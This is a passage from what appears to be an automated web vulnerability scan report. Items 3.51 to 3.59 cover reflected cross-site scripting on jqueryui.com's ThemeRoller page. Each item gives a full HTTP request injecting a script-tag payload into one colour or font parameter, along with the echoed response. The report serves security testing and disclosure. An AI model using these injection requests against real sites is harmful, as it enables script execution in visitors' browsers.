GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222269af0"><script>alert(1)</script>18274536c6e&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.51. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbdc8"><script>alert(1)</script>192e61c2ff2 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555dbdc8"><script>alert(1)</script>192e61c2ff2&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

3.52. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7fbc"><script>alert(1)</script>e518040edc1 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac7fbc"><script>alert(1)</script>e518040edc1&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

3.53. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d936"><script>alert(1)</script>738d6424a3a was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223d936"><script>alert(1)</script>738d6424a3a&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.54. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b3"><script>alert(1)</script>7c85cb6c075 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636803b3"><script>alert(1)</script>7c85cb6c075&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

3.55. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1068c"><script>alert(1)</script>7eef4e3fb21 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=2121211068c"><script>alert(1)</script>7eef4e3fb21&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

3.56. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ad2"><script>alert(1)</script>136246c6494 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif18ad2"><script>alert(1)</script>136246c6494&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

3.57. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4e4"><script>alert(1)</script>34d5273700b was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em3b4e4"><script>alert(1)</script>34d5273700b&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.58. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ae2"><script>alert(1)</script>6922eb8ad9f was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119977

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal19ae2"><script>alert(1)</script>6922eb8ad9f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.59. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f5f4"><script>alert(1)</script>c47e4b86f7e was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545456f5f4"><script>alert(1)</script>c47e4b86f7e&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&